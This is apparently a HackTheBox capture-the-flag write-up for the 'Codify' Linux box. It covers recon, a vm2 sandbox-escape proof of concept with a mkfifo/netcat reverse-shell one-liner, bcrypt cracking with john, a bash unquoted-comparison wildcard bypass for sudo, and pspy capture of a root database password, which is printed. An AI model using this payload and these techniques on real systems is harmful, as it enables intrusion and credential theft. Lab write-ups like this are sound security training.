HackTheBox: Codify


Damn, it's been a minute since I did a box. I didn't do one last week and I don't remember if I did one the week before.

This one is a brand new easy-rated linux box. Im excited. Almost everything this season has been windows.


We have three ports open: 1) 22 (SSH) 2) 80 (HTTP) 3) 3000 (HTTP)

Script scan shows us that the device appears to be running Ubuntu. The server on 80 is Apache. The server on 3000 is Node.js Express, which I've encountered a few times before.

The server on 80 attempts to redirect us to http://codify.htb, so I'll add that to /etc/hosts and run the scan again incase it catches anything new.

Ill start my standard recon procedure in the background while I enumerate the site manually: 1) nikto 2) gobuster directories 3) gobuster vhosts

Ill mention findings from the recon as they pop up.

Exploring the target website

The page gives us the following description of its functionality:

This website allows you to test your Node.js code in a sandbox environment. Enter your code in the editor and see the output in real-time.

Okay, so it's basically a node.js sandbox that executes user code. This might be as easy as inputting a reverse shell.

Right off the bat Im thinking the quick way to go is to google "nodejs sandbox escape" and see if there's any easy wins.

Note also that the site on ports 80 and 3000 appear identical.

There's also a link to a page regarding limitations of the sandbox.

Escaping the sandbox

On the "Limitations" page is a rundown of the blacklisted and whitelisted nodejs modules:

#### Restricted Modules

The following Node.js modules have been restricted from importing:

- child_process
- fs

#### Module Whitelist

Only a limited set of modules are available to be imported. Some of them are listed below. If you need a specific module that is not available, please contact the administrator by mailing [support@codify.htb](mailto:support@codify.htb) while our ticketing system is being migrated.

- url
- crypto
- util
- events
- assert
- stream
- path
- os
- zlib

Im going to read a couple articles on nodejs sandbox escape. The first one is here: https://www.netspi.com/blog/technical/web-application-penetration-testing/escape-nodejs-sandboxes/

The first goal is to figure out what level of access our code has to the underlying system. First we can try to generate a stack trace. In the editor, we enter:

var err = new Error();

success! This prints a stack trace:

    at vm.js:5:11
    at Script.runInContext (node:vm:135:12)
    at VM.runScript (/var/www/editor/node_modules/vm2/lib/vm.js:285:18)
    at /var/www/editor/node_modules/vm2/lib/vm.js:507:16
    at timeout_bridge.js:1:1
    at Script.runInContext (node:vm:135:12)
    at doWithTimeout (/var/www/editor/node_modules/vm2/lib/vm.js:132:29)
    at VM.run (/var/www/editor/node_modules/vm2/lib/vm.js:506:10)
    at /var/www/editor/index.js:51:27
    at Layer.handle [as handle_request] (/var/www/editor/node_modules/express/lib/router/layer.js:95:5)

The next step is to attempt to leak information about this, the nodejs way of self-referencing for objects. Unfortunately the module he used in the article, JSON.prune(), is not available on this system. It looks like what I can do is use util.inspect:

const util = require('util');
console.log(util.inspect(this, {depth: null, showHidden: true}));

which yields a HUGE info dump about functions in the current context.

However, it looks like I missed some very useful info: when we generated the stacktrace, it TOLD me what software it was using:

at VM.runScript (/var/www/editor/node_modules/vm2/lib/vm.js:285:18)

Its running a program called vm2, which is publicly available on Github here: https://github.com/patriksimek/vm2.

And better yet, the public GitHub repo has some posts in the "Security" tab of critical severity: (https://github.com/patriksimek/vm2/security) The latest was from June 12th and remains unpatched. It's an RCE vulnerability which even had a link to a poc: (https://gist.github.com/leesh3288/e4aa7b90417b0b0ac7bcd5b09ac7d3bd)

Testing the vm2_3.9.19 sandbox escape exploit

See the link above for the PoC. It has the following code to get RCE:

const {VM} = require("vm2");
const vm = new VM();

const code = `
const customInspectSymbol = Symbol.for('nodejs.util.inspect.custom');

obj = {
    [customInspectSymbol]: (depth, opt, inspect) => {
        inspect.constructor('return process')().mainModule.require('child_process').execSync('rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f &');
    valueOf: undefined,
    constructor: undefined,



Let's see if it works...

$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 48132
/bin/sh: 0: can't access tty; job control turned off
$ whoami

Hell yeah! Got a shell

Internal Enumeration/Pivoting

The user flag must be in the other user account, joshua. Im just the default svc user. Going to have to pivot.

Plan of attack: 1) upload linpeas and pspy 2) run linpeas and pspy while scrounging for credentials 3) dump database

Linpeas did not turn up much except for a script in /opt/scripts named mysql-backup.sh.

There is a database file /var/www/contact/tickets.db, but I couldnt find credentials for it. It turns out I didnt even need creds though, because I was able to dump it's contents using strings:

svc@codify:/var/www/contact$ strings tickets.db 
SQLite format 3
CREATE TABLE sqlite_sequence(name,seq)
        username TEXT UNIQUE, 
        password TEXT
Joe WilliamsLocal setup?I use this site lot of the time. Is it possible to set this up locally? Like instead of coming to this site, can I download this and set it up in my own computer? A feature like that would be nice.open
Tom HanksNeed networking modulesI think it would be better if you can implement a way to handle network-based stuff. Would help me out a lot. Thanks!open

Here you can easily spot joshua's password hash, $2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2.

Let me load it into a text file and set john on it.

Cracking the hash with John

John recognized the hash as 'bcypt' and cracked it pretty fast:

$ john hash --wordlist=/usr/share/SecLists/Passwords/rockyou.txt 
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spongebob1       (joshua)

There we have it: spongebob1 (joshua)

Thus our credentials are joshua:spongebob1. Ill use that to ssh in.

Privilege Escalation

Joshua can run only one thing as sudo, and that is the script I mentioned earlier:

joshua@codify:~$ sudo -l
[sudo] password for joshua: 
Matching Defaults entries for joshua on codify:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User joshua may run the following commands on codify:
    (root) /opt/scripts/mysql-backup.sh

Here is the script:


DB_USER="root"                                                                   DB_PASS=$(/usr/bin/cat /root/.creds)                                             BACKUP_DIR="/var/backups/mysql"                                                                       
read -s -p "Enter MySQL password for $DB_USER: " USER_PASS                       
if [[ $DB_PASS == $USER_PASS ]]; then                                            
        /usr/bin/echo "Password confirmed!"
        /usr/bin/echo "Password confirmation failed!"
        exit 1

/usr/bin/mkdir -p "$BACKUP_DIR"

databases=$(/usr/bin/mysql -u "$DB_USER" -h -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")

for db in $databases; do
    /usr/bin/echo "Backing up database: $db"
    /usr/bin/mysqldump --force -u "$DB_USER" -h -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"

/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'       

I cant see a whole lot to abuse in this script using methods like path hijacking.

I see that it loads the correct password into an environment variable and then compares that to what the user enters:

DB_PASS=$(/usr/bin/cat /root/.creds)

I wonder if it's possible to execute this script, suspend it, and examine it's process memory to dump it's environment variables? Doesnt seem like it; everything I try to open gives me permission denied.

Im thinking what we want to do is figure out a way to get the string comparison to evaluate to true.

GOT IT!!!! I figured out the trick thanks to this page here explaining the use of the [[ ]] operator in bash for testing: (https://mywiki.wooledge.org/BashFAQ/031) It turns out there's a pattern-matching character in bash that you would use as follows:

[[ $name = a* ]] || echo "name does not start with an 'a': $name"

Where * is the wildcard character. Because the character didnt enclose the variables in quotes Im able to input * when prompted for a password and effectively bypass the check entirely, as it will match whatever the password is.

Then I run this with pspy listening and capture the cleartext creds. In one terminal:

$ sudo /opt/scripts/mysql-backup.sh 

Enter MySQL password for root: *
Password confirmed!
mysql: [Warning] Using a password on the command line interface can be insecure.
Backing up database: mysql
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- Warning: column statistics not supported by the server.
mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES
mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES
Backing up database: sys
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- Warning: column statistics not supported by the server.
All databases backed up successfully!
Changing the permissions

And here's what I captured with pspy:

/usr/bin/mysql -u root -h -P 3306 -pkljh12k3jhaskjh12kjh3 -e SHOW DATABASES;

Hell yeah. We got the cleartext creds. First lets try to su into the system root account with the password kljh12k3jhaskjh12kjh3 just in case he recycled it. Even if it doesnt work there it will for the database root account, so we'll hit that next:

joshua@codify:/tmp/tmp.YUp7JSAuej$ su root
Password: kljh12k3jhaskjh12kjh3

root@codify:/tmp/tmp.YUp7JSAuej# whoami